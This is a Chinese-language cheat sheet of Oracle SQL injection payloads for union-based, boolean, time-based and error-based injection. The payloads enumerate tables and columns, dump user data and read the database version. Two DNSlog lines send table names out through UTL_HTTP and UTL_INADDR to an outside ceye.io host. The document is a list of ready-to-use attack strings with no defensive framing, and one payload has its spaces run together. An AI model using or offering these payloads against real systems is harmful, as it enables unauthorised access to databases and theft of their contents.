联合查询注入

order by 3--

and 1=2 union select null,null,null from dual--

and 1=2 union select 'null',null,null from dual--  //返回正常，则第一个字段是数字型，返回错误，为字符型

and 1=2 union select 1,'2','3' from dual--  //判断显示位

and 1=2 union select null,(select banner from sys.v_$version where rownum=1),null from dual--  //探测数据库版本信息

and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual--  //查询第一个表名

and 1=2 union select null,(select table_name from user_tables where rownum=1 and table_name<>'STUDENT'),null from dual--  //第二个表名

and 1=2 union select null,(select column_name from user_tab_columns where table_name='[表名]' and rownum=1),null from dual-- //查看第一个字段名

and 1=2 union select null,(select column_name from user_tab_columns where table_name='[表名]' and rownum=1 and column_name<>'[第一个表名]'),null from dual-- //查看第二个字段名

and 1=2 union select null,(select column_name from user_tab_columns where table_name='[表名]' and rownum=1 and column_name<>'[第一个表名]' and column_name<>'[第二个表名]'),null from dual--

and 1=2 union select id,name,pass from student where id=1--  //查看数据

盲注

1、DNSlog（此方法需要 Oracle 数据库用户拥有网络访问权限 手动添加权限参考 http://blog.itpub.net/26736162/viewspace-2072163/ )

union SELECT null,UTL_HTTP.REQUEST((select table_name from user_tables where rownum=1)||'.5nj58o.ceye.io'),null FROM DUAL--  //UTL_HTTP.REQUEST型

union SELECT null,UTL_INADDR.GET_HOST_ADDRESS((select table_name from user_tables where rownum=1)||'.5nj58o.ceye.io'),null FROM DUAL--  //UTL_INADDR.GET_HOST_ADDRESS型

2、布尔盲注

and (select count(table_name) from user_tables)>1--  //获取表的个数

and (select length(table_name) from user_tables where rownum=1)>1--  //获取第一个表的表名长度

and ascii(substr((select table_name from user_tables where rownum=1),1,1))>80--  //获取第一个表的第一个字符的Ascii码的值

3、时间盲注（慎用，会很卡）

and 1=(select decode(substr((select table_name from user_tables where rownum=1),1,1),'S',(select count(*) from all_objects),1) from dual)--  //判断第一个表名的第一个字符

报错注入（获取数据库版本信息）

and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and (select dbms_xdb_version.makeversioned((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and(selectdbms_xdb_version.uncheckout((selectbannerfromsys.v_$versionwhere rownum=1)) from dual) is not null--

and (SELECT dbms_utility.sqlid_to_sqlhash((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and (select dbms_streams.get_information((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and (select dbms_xmlschema.generateschema((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and (select dbms_xmltranslations.extractxliff((select banner from sys.v_$version where rownum=1)) from dual) is not null--

and 1=ordsys.ord_dicom.getmappingxpath((select banner from sys.v_$versionwhere rownum=1),user,user)--

and 1=utl_inaddr.get_host_name((select banner from sys.v_$version where rownum=1))--

and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))--

and (select upper(XMLType(chr(60)||chr(58)||(select banner from sys.v_$version where rownum=1)||chr(62))) from dual) is not null--